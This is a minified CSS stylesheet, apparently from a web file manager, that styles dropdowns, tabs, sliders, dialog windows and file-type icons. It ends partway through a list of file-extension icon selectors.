.select2-results__option[aria-selected=true]:after,span.select2-container--classic .select2-results__option[aria-selected=true]:after{content:"\f00c";color:#3a96ff;position:absolute;right:10px;font-size:14px;font-family:FontAwesome;}span.select2-container--default .select2-results__option--highlighted[aria-selected],span.select2-container--classic .select2-results__option--highlighted[aria-selected]{background-color:#eee;color:#444;}span.select2-container--default.select2-container--open.select2-container--above .select2-selection--single,span.select2-container--classic.select2-container--open.select2-container--above .select2-selection--single{border-top:1px solid transparent;}span.select2-container--default.select2-container--open.select2-container--below .select2-selection--multiple,span.select2-container--classic.select2-container--open.select2-container--below .select2-selection--multiple{border-bottom:1px solid transparent;}span.select2-container--default.select2-container--open .select2-dropdown.select2-dropdown--below,span.select2-container--classic.select2-container--open .select2-dropdown.select2-dropdown--below{border-color:#3a96ff;outline:none;box-shadow:0 0 20px #71c0ff;border-color:#bfcbd9;box-shadow:0 2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);margin-top:-1px;}span.select2-container--default.select2-container--open .select2-dropdown.select2-dropdown--above,span.select2-container--classic.select2-container--open .select2-dropdown.select2-dropdown--above{border-color:#3a96ff;outline:none;box-shadow:0 0 20px #71c0ff;border-color:#bfcbd9;box-shadow:0 2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);margin-top:1px;box-shadow:0 -2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);}span.select2-container--default.select2-container--open .select2-selection--multiple,span.select2-container--default.select2-container--open .select2-selection--single,span.select2-container--classic.select2-container--open .select2-selection--multiple,span.select2-container--classic.select2-container--open .select2-selection--single{border-color:#3a96ff;outline:none;box-shadow:0 0 20px #71c0ff;border-color:#bfcbd9;box-shadow:0 2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);}span.select2-container--default .ztree,span.select2-container--classic .ztree{padding:0;}span.select2-container--default .ztree li a,span.select2-container--classic .ztree li a{padding-left:0;height:26px;line-height:26px;border:none;margin:0;border-radius:0;}span.select2-container--default .ztree li a.this,span.select2-container--classic .ztree li a.this{background:#edf5ff;border:none;height:26px;line-height:26px;}span.select2-container--default .ztree li a.this:hover,span.select2-container--classic .ztree li a.this:hover{color:#3a96ff;}span.select2-container--default .ztree li a:hover,span.select2-container--classic .ztree li a:hover{border:none;margin:0;border-radius:0;color:#3a96ff;}span.select2-container--default .ztree .check-icon,span.select2-container--classic .ztree .check-icon{float:right;color:#fff;font-size:12px;text-align:center;width:15px;height:15px;line-height:15px;padding:0;margin-top:5px;margin-right:5px;-webkit-transition:all .1s ease-in-out;-moz-transition:all .1s ease-in-out;-o-transition:all .1s ease-in-out;-ms-transition:all .1s ease-in-out;transition:all .1s ease-in-out;}span.select2-container--default .ztree .check-icon:before,span.select2-container--classic .ztree .check-icon:before{content:"\f";}span.select2-container--default .ztree a.this .check-icon:before,span.select2-container--classic .ztree a.this .check-icon:before{content:"\f00c";color:#3a96ff;}body .select2-container{width:270px;margin-right:10px;}.tab-group{text-align:center;margin-bottom:-12px;}.tab-group .tab-item{background:#fff;text-align:left;display:inline-block;margin-left:-5px;border:1px solid #ccc;border-bottom-color:#a6a6a6;border-right-color:#b8b8b8;}.tab-group .tab-item:hover{background:#e6e6e6;}.tab-group .tab-item:first-child{border-top-left-radius:3px;border-bottom-left-radius:3px;}.tab-group .tab-item:last-child{border-top-right-radius:3px;border-bottom-right-radius:3px;}.tab-group .tab-item a{text-decoration:none;color:#444;padding:0 15px;height:24px;display:inline-block;line-height:24px;}.tab-group .tab-item.active a{color:#fff;}.tab-group .tab-item.active,.tab-group .tab-item.active:hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#6eb4f7', endColorstr='#1a82fb');background-image:-webkit-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:-moz-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:-o-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:-ms-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);-pie-background:linear-gradient(to to bottom,#6eb4f7 0,#1a82fb 100%);color:#fff;z-index:10;border-color:#3f87dc;border-top-color:#4396e6;border-color:#388df8 #388df8 #0866dc transparent;}.tab-group .tab-item.active:hover,.tab-group .tab-item.active:active{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#3e9bf4', endColorstr='#0469de');background-image:-webkit-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:-moz-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:-o-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:-ms-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);-pie-background:linear-gradient(to to bottom,#3e9bf4 0,#0469de 100%);}.tab-group .tab-item:last-child.active,.tab-group .tab-item.active + .tab-item{border-left-color:transparent;}body .slider .slider-track{background:#ddd;box-shadow:none;}body .slider.slider-horizontal .slider-track{height:6px;}body .slider .slider-selection{transition:background-color .3s ease;background:#2196f3;box-shadow:none;}body .slider .slider-handle{margin-left:-7px;margin-top:-6px;width:14px;height:14px;cursor:pointer;border-radius:50%;border:2px solid #88c7f4;background:#fff;transition:border-color .3s ease, transform .3s cubic-bezier(.18,.89,.32,1.28);}body .slider .slider-handle.round:hover{box-shadow:0 0 0 6px rgba(150,219,250,0.7);}body .slider .tooltip{transition:all 0.168s cubic-bezier(0,0.84,0.58,1);}body .slider .tooltip.top{margin-top:-43px;}body .slider .tooltip.bottom{margin-top:20px;}body .slider .tooltip.top .tooltip-arrow{border-top-color:rgba(0,0,0,0.7);}body .slider .tooltip.bottom .tooltip-arrow{border-bottom-color:rgba(0,0,0,0.7);}body .slider .tooltip-inner{background-color:rgba(0,0,0,0.7);box-shadow:0 1px 5px rgba(0,0,0,0.2);padding:8px 15px;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .aui-outer .aui-buttons{box-shadow:0 0 20px #ddd;border-top:1px solid #eee;height:45px;padding-top:5px;border-top:none;background:#fff;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .form-box.config-box .panel-body{left:130px;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group{position:absolute;left:0;padding:0;width:140px;height:100%;padding-top:20px;z-index:99999;background:#f5f7fa;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item{display:block;border:none;background:none;border-radius:0;font-size:14px;-webkit-transition:0.16s all;-moz-transition:0.16s all;-o-transition:0.16s all;-ms-transition:0.16s all;transition:0.16s all;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:hover{background:#eee;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:first-child,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:last-child{border-radius:0;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item a{padding:0 20px 0 15px;display:block;height:40px;line-height:40px;text-align:right;white-space:nowrap;text-overflow:ellipsis;overflow:hidden;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active a{color:#2196F3;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:hover{background:#fff;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:hover,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:active{background:#fff;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:hover a,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:active a{color:#2196F3;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:last-child.active,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active + .tab-item{border-left-color:transparent;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header{height:40px;border-bottom:1px solid #adabad;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#d3d1d3', endColorstr='#e7e5e7');background-image:-webkit-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:-moz-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:-o-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:-ms-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);-pie-background:linear-gradient(to bottom,#d3d1d3 0%,#e7e5e7 100%);}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header .modal-title{height:40px;line-height:40px;padding-left:20px;font-size:12px;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header .modal-title img,body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header .modal-title .x-item-file{height:22px;width:22px;top:8px;margin-right:4px;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-row .setting-title{text-align:right;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-row.form-userSelect .setting-content{background:#f4f4f4;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-row.error .setting-content{background:#ffefed;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .panel-body{background:#eee;border:1px solid #e3e3e3;margin:20px;top:60px;bottom:30px;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .panel-body .line,body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .panel-body hr{border-color:#ddd;}body .dialog-plugin-config.dialog-form-style-mac .tab-group{position:absolute;margin-top:25px;width:100%;z-index:999;}body .dialog-plugin-config.dialog-form-style-mac .aui-content{background:#f9f9f9;}body .dialog-plugin-config.dialog-form-style-mac .aui-outer .aui-title{height:40px;}body .dialog-plugin-config.dialog-form-style-mac .aui-outer .aui-buttons{padding-right:20px;height:30px;border-top:1px solid #ddd;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#f2f4f7', endColorstr='#f5f7fa');background-image:-webkit-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-moz-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-o-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-ms-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);-pie-background:linear-gradient(to left,#f2f4f7 0%,#f5f7fa 100%);background:#f9f9f9;border:none;}body .dialog-plugin-config.dialog-form-style-mac .aui-outer .aui-buttons button{margin-top:1px;margin-left:20px;padding:0 2em;height:25px;}.message-box{position:absolute;top:15%;left:0px;z-index:88;background:#63acff;color:#fff;opacity:0.7;filter:alpha(opacity=70);-webkit-border-radius:1px;-moz-border-radius:1px;border-radius:1px;-webkit-box-shadow:0 10px 60px rgba(0,0,0,0.6);-moz-box-shadow:0 10px 60px rgba(0,0,0,0.6);box-shadow:0 10px 60px rgba(0,0,0,0.6);display:none;}.message-box .content{padding:10px 30px;line-height:20px;width:auto;}.aui-outer{text-align:left;position:relative;}.aui-mask{position:absolute;width:100%;height:100%;background:#fff;opacity:0.01;filter:alpha(opacity=1);}.aui-loading{height:100%;width:100%;overflow:hidden;opacity:0.7;filter:alpha(opacity=70);position:absolute;left:0;top:40px;z-index:9999;text-align:center;text-indent:-999em;}.aui-loading span{width:80px;height:80px;border-radius:6px;background:#fff url("../../../images/common/dialog/dialog_loading.gif") no-repeat center center;position:absolute;left:50%;top:50%;margin-left:-40px;margin-top:-40px;}table.aui-border,table.aui-dialog{width:100%;border:0;margin:0;border-collapse:collapse;}.aui-nw,.aui-n,.aui-ne,.aui-w,.aui-c,.aui-e,.aui-sw,.aui-s,.aui-se,.aui-header,.aui-td-icon,.aui-main,.aui-footer{padding:0;}.aui-header,.aui-buttons button{font:12px/1.11;}.aui-title{overflow:hidden;text-overflow:ellipsis;font-size:1em;}.aui-title img,.aui-title .x-item-file{width:20px;margin-right:5px;border-radius:4px;cursor:pointer;pointer-events:all;}.aui-title img:hover,.aui-title .x-item-file:hover{transform:scale(1.1,1.1);}.aui-state-no-title .aui-title{display:none;}.aui-main{font-size:1.1em;text-align:center;background:#FFF;min-width:9em;min-width:0 \9;visibility:auto;}.aui-content{text-align:left;color:#666;border:none 0;}.aui-content{width:100%;height:100%;}.aui-content.aui-state-full{display:block;width:100%;margin:0;padding:0 !important;height:100%;}.aui-icon{vertical-align:middle;background:#fff;}.aui-icon div{width:48px;height:48px;margin:10px 0 10px 10px;background-position:center center;background-repeat:no-repeat;}.aui-buttons{padding:10px 8px;text-align:right;white-space:nowrap;background-color:#F6F6F6;border-top:solid 1px #DADEE5;}.aui-buttons button{margin-left:15px;padding:3px 20px;height:25px;cursor:pointer;display:inline-block;text-align:center;line-height:1;overflow:visible;color:#000000;border:none;background:#aaa;color:#fff;}.aui-buttons button:focus{outline:none 0;}.aui-buttons button:hover{background:#c4c4c4;}.aui-buttons button:active{background:#777777;}.aui-buttons button[disabled]{cursor:default;color:#919191;background:#aaa;opacity:0.5;filter:alpha(opacity=50);}.aui-buttons button::-moz-focus-inner{border:0;padding:0;margin:0;}.aui-buttons button.aui-state-highlight{color:#FFF;background:#63acff;}.aui-buttons button.aui-state-highlight:hover{color:#FFF;background:#96c7ff;}.aui-buttons button.aui-state-highlight:active{background:#0076fc;}.aui-buttons button.disable,.aui-buttons button.disabled{opacity:0.3;filter:alpha(opacity=30);}.aui-outer{border:0px solid #63acff;-webkit-box-shadow:0px 5px 20px rgba(0,0,0,0.6);-moz-box-shadow:0px 5px 20px rgba(0,0,0,0.6);box-shadow:0px 5px 20px rgba(0,0,0,0.6);-webkit-transition:box-shadow 0.1s opacity 0.2s;-moz-transition:box-shadow 0.1s opacity 0.2s;-o-transition:box-shadow 0.1s opacity 0.2s;-ms-transition:box-shadow 0.1s opacity 0.2s;transition:box-shadow 0.1s opacity 0.2s;}.aui-state-lock .aui-nw,.aui-state-lock .aui-n,.aui-state-lock .aui-ne,.aui-state-lock .aui-w,.aui-state-lock .aui-e,.aui-state-lock .aui-sw,.aui-state-lock .aui-s,.aui-state-lock .aui-se{background:rgba(0,0,0,0.5);background:#000 \9 !important;opacity:0.5;filter:alpha(opacity=50);}.aui-title-bar{position:relative;height:100%;}.aui-title{height:31px;line-height:30px;padding:0 28px 0 10px;color:#fff;background-color:#7dbaff;}.aui-state-focus .aui-mask{display:none;}.aui-state-focus .aui-outer{-webkit-box-shadow:0px 5px 40px rgba(0,0,0,0.7);-moz-box-shadow:0px 5px 40px rgba(0,0,0,0.7);box-shadow:0px 5px 40px rgba(0,0,0,0.7);}.aui-state-focus .aui-title{background-color:#63acff;}.aui-state-drag .aui-title{cursor:move;cursor:-webkit-grabbing;cursor:grabbing;}.aui-min,.aui-max,.aui-close{display:block;position:absolute;text-decoration:none;outline:none;cursor:pointer;font-size:1.25em;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;color:#fff;border-top:none;top:0px;height:22px;width:35px;font-size:1.15em;line-height:22px;text-align:center;background-color:transparent;height:24px;width:38px;line-height:25px;color:#ffffff;font-family:FontAwesome;}.aui-min:hover,.aui-max:hover,.aui-close:hover{text-decoration:none;color:#fff;background-color:#1783ff;}.aui-close:hover{background:#cc0000;}.aui-min{right:82px;content:"\f068";}.aui-max{right:43px;content:"\f065";}.aui-close{right:5px;content:"\f00d";}.aui-min:before{content:"\f068";}.aui-max:before{content:"\f065";}.aui-close:before{content:"\f00d";}.aui-max,.aui-min{display:none;}.aui-state-no-title .aui-nw,.aui-state-no-title .aui-ne,.aui-state-no-title .aui-sw,.aui-state-no-title .aui-se{width:5px;height:5px;}.aui-state-no-title .aui-title-bar{bottom:0;_bottom:0;_margin-top:0;}.aui-state-no-title .aui-outer{box-shadow:none !important;border:none !important;}.aui-state-no-title .aui-inner{border:1px solid #aaa;}.aui-state-no-title .tips{padding:15px;padding-left:10px;}.aui-state-no-title .aui-nw,.aui-state-no-title .aui-n,.aui-state-no-title .aui-ne,.aui-state-no-title .aui-w,.aui-state-no-title .aui-e,.aui-state-no-title .aui-sw,.aui-state-no-title .aui-s,.aui-state-no-title .aui-se{background:rgba(0,0,0,0.1);background:#000 \9 !important;filter:alpha(opacity=10)!important;}.aui-state-no-title .aui-close,.aui-state-no-title .aui-max,.aui-state-no-title .aui-min{display:none;font-size:1em;}.dialog-max .aui-nw,.dialog-max .aui-ne,.dialog-max .aui-sw,.dialog-max .aui-se,.dialog-max .aui-w,.dialog-max .aui-e{width:0px;}.dialog-max .aui-sw,.dialog-max .aui-n,.dialog-max .aui-se{height:0px;}.dialog-max .aui-outer{border:none !important;}.dialog-can-resize .resize-handle{position:absolute;z-index:999999;display:block;}.dialog-can-resize .resize-top{cursor:n-resize;top:-3px;left:0px;height:7px;width:100%;}.dialog-can-resize .resize-bottom{cursor:s-resize;bottom:-3px;left:0px;height:7px;width:100%;}.dialog-can-resize .resize-right{cursor:e-resize;right:-3px;top:0px;width:7px;height:100%;}.dialog-can-resize .resize-left{cursor:w-resize;left:-3px;top:0px;width:7px;height:100%;}.dialog-can-resize .resize-bottom-right{cursor:se-resize;width:18px;height:18px;right:-7px;bottom:-7px;background:url('../../../images/common/dialog/resize_corner.png') no-repeat;opacity:0.4;filter:alpha(opacity=40);}.dialog-can-resize .resize-bottom-left{cursor:sw-resize;width:15px;height:15px;left:-7px;bottom:-7px;}.dialog-can-resize .resize-top-left{cursor:nw-resize;width:15px;height:15px;left:-7px;top:-7px;}.dialog-can-resize .resize-top-right{cursor:ne-resize;width:15px;height:15px;right:-5px;top:-7px;}.dialog-can-resize .aui-min,.dialog-can-resize .aui-max{display:block;}.dialog-min-size{width:250px !important;height:30px !important;}.dialog-min-size.dialog-no-title .aui-title,.dialog-min-size .aui-title{opacity:1 !important;}.dialog-min-size .aui-outer{width:250px;}.dialog-min-size .aui-header{height:30px;}.dialog-min-size .aui-title{text-align:left;padding-left:10px;}.dialog-min-size .aui-main,.dialog-min-size .aui-footer{display:none;}.dialog-min-size .resize-handle{display:none;}.dialog-no-title .aui-title-bar{position:absolute;z-index:99999;width:100%;height:30px;top:0;}.dialog-no-title .aui-title{opacity:0.01 !important;filter:alpha(opacity=1) !important;}.dialog-no-title .aui-inner{border:none;}.dialog-no-title .aui-nw,.dialog-no-title .aui-n,.dialog-no-title .aui-ne,.dialog-no-title .aui-w,.dialog-no-title .aui-e,.dialog-no-title .aui-sw,.dialog-no-title .aui-s,.dialog-no-title .aui-se{display:none;}.dialog-no-title .aui-outer .aui-min{right:80px;}.dialog-no-title .aui-outer .aui-min:before{content:"\f068" !important;}.dialog-no-title .aui-outer .aui-max{right:40px;}.dialog-no-title .aui-outer .aui-max:before{content:"\f065" !important;}.dialog-no-title .aui-outer .aui-close{right:0px;}.dialog-no-title .aui-outer .aui-close:before{content:"\f00d" !important;}.dialog-no-title .aui-outer .aui-min,.dialog-no-title .aui-outer .aui-max,.dialog-no-title .aui-outer .aui-close{display:block;position:absolute;text-decoration:none;outline:none;font-size:1.25em;-webkit-transition:all 0.1s;-moz-transition:all 0.1s;-o-transition:all 0.1s;-ms-transition:all 0.1s;transition:all 0.1s;color:#fff;top:0px;cursor:pointer;height:30px;line-height:30px;text-align:center;background-color:transparent;width:40px;font-family:FontAwesome;border:none;background-image:none;border-radius:0;}.dialog-no-title .aui-outer .aui-min:hover,.dialog-no-title .aui-outer .aui-max:hover,.dialog-no-title .aui-outer .aui-close:hover{color:#fff;border:none;box-shadow:none;background:#41acf8;background:rgba(0,0,0,0.4);}.dialog-no-title .aui-outer .aui-close:hover{background:#e81123;background:rgba(232,17,35,0.8);}.dialog-no-title.header-bg .aui-content .header{height:90px;background-color:#008def;background-image:linear-gradient(to bottom,#084998 0,#00a9fb 100%);color:#fff;position:relative;}.dialog-no-title.header-bg .aui-content .header .bg{background:url("../../../images/common/banner/box.png") 180px -220px no-repeat;width:100%;height:100%;position:absolute;opacity:0.7;}.dialog-no-title.dialog-max .aui-outer .aui-max{right:40px;}.dialog-no-title.dialog-max .aui-outer .aui-max:before{content:"\f066" !important;}body div.dialog-simple .aui-title-bar{width:100%;position:relative;bottom:0;height:100%;}body div.dialog-simple .aui-border{border:none;overflow:auto;}body div.dialog-simple .aui-outer{border:none;border-radius:none;box-shadow:none;background:none;}body div.dialog-simple .aui-inner{border:none;background:none;}body div.dialog-simple .aui-nw,body div.dialog-simple .aui-n,body div.dialog-simple .aui-ne,body div.dialog-simple .aui-w,body div.dialog-simple .aui-e,body div.dialog-simple .aui-sw,body div.dialog-simple .aui-s,body div.dialog-simple .aui-se{background:none;}body div.dialog-simple .aui-title{background:rgba(0,0,0,0.8);opacity:0.8;filter:alpha(opacity=80);border-radius:3px;border:none;height:31px;line-height:30px;padding:0 28px 0 10px;color:#fff;}body div.dialog-simple .aui-min,body div.dialog-simple .aui-max,body div.dialog-simple .aui-close{border:none;top:5px;position:absolute;text-decoration:none;outline:none;cursor:pointer;background-color:rgba(255,255,255,0.3);color:#fff;opacity:0.5;filter:alpha(opacity=50);height:22px;width:22px;font-size:1.15em;line-height:22px;text-align:center;border-radius:4px;font-family:FontAwesome;}body div.dialog-simple .aui-min:hover,body div.dialog-simple .aui-max:hover,body div.dialog-simple .aui-close:hover{text-decoration:none;color:#fff;background-color:#cc0000;}body div.dialog-simple .aui-min:active,body div.dialog-simple .aui-max:active,body div.dialog-simple .aui-close:active{color:fff;background-color:#f00;}body div.dialog-simple .aui-main{background:none !important;}body div.dialog-simple .aui-max{right:30px;}body div.dialog-simple .aui-min{right:56px;}body div.dialog-simple .aui-dialog,body div.dialog-simple .aui-border{background:none;}body div.dialog-simple .resize-bottom-right{background:none !important;}body div.dialog-simple .aui-header{opacity:0.01;filter:alpha(opacity=1);border:1px solid rgba(0,0,0,0.01);border-bottom:none;}body div.dialog-simple .aui-nw,body div.dialog-simple .aui-ne{height:0px;}body div.dialog-simple.aui-state-drag .aui-header,body div.dialog-simple .dialog-mouse-in .aui-header{opacity:1.0;filter:alpha(opacity=100);}body div.dialog-simple.dialog-can-resize .aui-max,body div.dialog-simple.dialog-can-resize .aui-min{display:block;}body div.dialog-simple.dialog-can-resize .aui-main{border:1px solid rgba(0,0,0,0.01);border-top:none;}body div.dialog-simple.dialog-can-resize.aui-state-drag .aui-main,body div.dialog-simple.dialog-can-resize .dialog-mouse-in .aui-main{border-color:rgba(0,0,0,0.2);}body div.dialog-simple.dialog-can-resize.aui-state-drag .aui-header,body div.dialog-simple.dialog-can-resize .dialog-mouse-in .aui-header{opacity:1.0;filter:alpha(opacity=100);border-color:rgba(0,0,0,0.2);}body div.dialog-simple.aui-state-drag .aui-header{opacity:1.0;filter:alpha(opacity=100);}body div.dialog-simple.dialog-max .aui-header{opacity:1.0;filter:alpha(opacity=100);}.x-item-small{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.x-item-file{background-repeat:no-repeat;background-size:cover;background-position:center;background-image:url("../../../images/file_icon/icon_file/file.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');width:100%;height:100%;display:inline-block;pointer-events:none;}.x-item-file.small{width:20px;height:20px;}.file-list-icon .file .ico .x-item-file{border-radius:5px;margin-top:6px;margin-top:4px;}.bindary-box .ico .x-item-file{width:90px;height:90px;margin-top:28px;}.file-list-list .file .ico .x-item-file,.file-list-split .file .ico .x-item-file{border:none;}.ztree li span.tree_icon .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.header-content #yarnball .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.task-tab .tabs .tab .x-item-file,.task-tab .tabs .tab img{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.tasktab-dragging.tab .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.tasktab-dragging.tab img{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.aui-title .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.edit-tab .tabs .tab .name .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.draggable-dragging .name .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.do-search-box .search-result .file-item .file-info .file-icon .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.context-menu-list .context-menu-item .font-icon.x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;margin-right:12px;}.context-menu-list .context-menu-item .font-icon.x-item-file:before{content:"";}.context-menu-list .context-menu-item img.x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;background:none;margin-right:12px;height:auto;}.aui-title .x-item-file.x-font-icon{font-size:12px;line-height:18px;color:#fff;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.5)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-moz-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-o-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-ms-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));-pie-background:linear-gradient(to 164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));}.x-txt.small,.x-textile.small,.x-inc.small,.x-log.small{background-image:url("../../../images/file_icon/icon_file/txt_small.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt_small.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt_small.png?ver=3.30',sizingMethod='scale');background-size:auto;}.x-php.small{background-image:url("../../../images/file_icon/icon_file/php_small.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php_small.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php_small.png?ver=3.30',sizingMethod='scale');background-size:auto;}.x-txt,.x-textile,.x-oexe,.x-inc,.x-csv,.x-log,.x-asc,.x-tsv,.x-lnk,.x-url,.x-webloc,.x-meta,.x-localized,.x-xib,.x-xsd,.x-storyboard,.x-plist,.x-csproj,.x-pch,.x-pbxproj,.x-local,.x-xcscheme,.x-manifest,.x-vbproj,.x-strings,.x-jshintrc,.x-sublime-project,.x-readme,.x-changes,.x-changelog,.x-version,.x-license,.x-changelog,.x-abap,.x-abc,.x-as,.x-asp,.x-aspx,.x-ada,.x-adb,.x-htaccess,.x-htgroups,.x-htgroups,.x-htpasswd,.x-asciidoc,.x-adoc,.x-asm,.x-a,.x-ahk,.x-bat,.x-cmd,.x-cpp,.x-c,.x-cc,.x-cxx,.x-h,.x-hh,.x-hpp,.x-ino,.x-c9search_results,.x-cirru,.x-cr,.x-clj,.x-cljs,.x-cbl,.x-cob,.x-coffee,.x-cf,.x-cson,.x-cakefile,.x-cfm,.x-cs,.x-css,.x-curly,.x-d,.x-di,.x-dart,.x-diff,.x-patch,.x-dockerfile,.x-dot,.x-dummy,.x-dummy,.x-e,.x-ge,.x-ejs,.x-ex,.x-exs,.x-elm,.x-erl,.x-hrl,.x-frt,.x-fs,.x-ldr,.x-ftl,.x-gcode,.x-feature,.x-.gitignore,.x-glsl,.x-frag,.x-vert,.x-gbs,.x-go,.x-groovy,.x-haml,.x-hbs,.x-handlebars,.x-tpl,.x-mustache,.x-hs,.x-hx,.x-html,.x-hta,.x-htm,.x-xhtml,.x-eex,.x-html.eex,.x-erb,.x-rhtml,.x-html.erb,.x-ini,.x-inf,.x-conf,.x-cfg,.x-prefs,.x-io,.x-jack,.x-jade,.x-java,.x-ji,.x-jl,.x-jq,.x-js,.x-jsm,.x-json,.x-jsp,.x-jsx,.x-latex,.x-ltx,.x-bib,.x-lean,.x-hlean,.x-less,.x-liquid,.x-lisp,.x-ls,.x-logic,.x-lql,.x-lsl,.x-lua,.x-lp,.x-lucene,.x-Makefile,.x-makemakefile,.x-gnumakefile,.x-makefile,.x-ocamlmakefile,.x-make,.x-md,.x-markdown,.x-mask,.x-matlab,.x-mz,.x-mel,.x-mc,.x-mush,.x-mysql,.x-nix,.x-nsi,.x-nsh,.x-m,.x-mm,.x-ml,.x-mli,.x-pas,.x-p,.x-pl,.x-pm,.x-pgsql,.x-php,.x-phtml,.x-shtml,.x-php3,.x-php4,.x-php5,.x-phps,.x-phpt,.x-aw,.x-ctp,.x-module,.x-ps1,.x-praat,.x-praatscript,.x-psc,.x-proc,.x-plg,.x-prolog,.x-properties,.x-proto,.x-py,.x-r,.x-cshtml,.x-rd,.x-rhtml,.x-rst,.x-rb,.x-ru,.x-gemspec,.x-rake,.x-guardfile,.x-rakefile,.x-g